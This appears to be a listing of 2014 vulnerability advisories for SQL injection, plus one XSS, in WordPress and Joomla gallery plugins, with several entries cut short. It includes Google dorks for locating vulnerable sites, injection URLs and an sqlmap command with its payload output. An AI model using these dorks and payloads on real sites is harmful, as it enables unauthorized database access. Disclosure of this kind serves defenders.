######################
# Exploit Title : WordPress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://huge-it.com/
# Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip (Fixed)
# Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs
# Date : 2014-08-25
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location : http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php
######################
# Vulnerable code :
function editgallery($id)
{
global $wpdb;
if(isset($_GET["removeslide"])){
if($_GET["removeslide"] !...
######################
# Exploit Title : Joomla Spider video player 2.8.3 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/22321
# Dork Google: inurl:/component/spidervideoplayer
# inurl:option=com_spidervideoplayer
# Date : 2014-08-26
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# PoC Exploit:
http://localhost/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
The "theme" request parameter is not sanitized before it is used in the query.
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www....
######################
# Exploit Title : WordPress GB Gallery Slideshow 1.5 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://gb-plugins.com/
# Software Link : http://downloads.wordpress.org/plugin/gb-gallery-slideshow.1.5.zip
# Date : 2014-08-09
# Tested on : Linux / sqlmap 1.0-dev-5b2ded0
# Linux / Mozilla Firefox
######################
# Location : http://localhost/wp-content/plugins/gb-gallery-slideshow/GBgallery.php
######################
# Vulnerable code :
if(isset($_POST['selected_group'])){
global $gb_post_type, $gb_group_table, $wpdb;
$my_group_id = $_POST['selected_group'];
$my_group = $wpdb->get_results( "SELECT groups FROM $gb_group_table WHERE id = "....
######################
# Exploit Title : WordPress Video Gallery 2.5 SQL Injection and XSS Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
# Software Link : http://downloads.wordpress.org/plugin/contus-video-gallery.2.5.zip
# Dork Google: inurl:/contus-video-gallery/hdflvplayer/hdplayer.swf
(Click on "Repeat the search with the omitted results included")
# Date : 2014-07-15
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1....
######################
# Exploit Title : WordPress Gallery Objects 0.4 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://galleryobjects.com/
# Software Link : http://downloads.wordpress.org/plugin/gallery-objects.0.4.zip
# Dork Google: inurl:/admin-ajax.php?action=go_view_object
# Date : 2014-07-18
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0
######################
# PoC via browser:
http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html
# PoC via sqlmap:
sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid
---
Place: GET
Parameter: viewid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---
#####################
Discovered By : Claudio Viviani
http://www....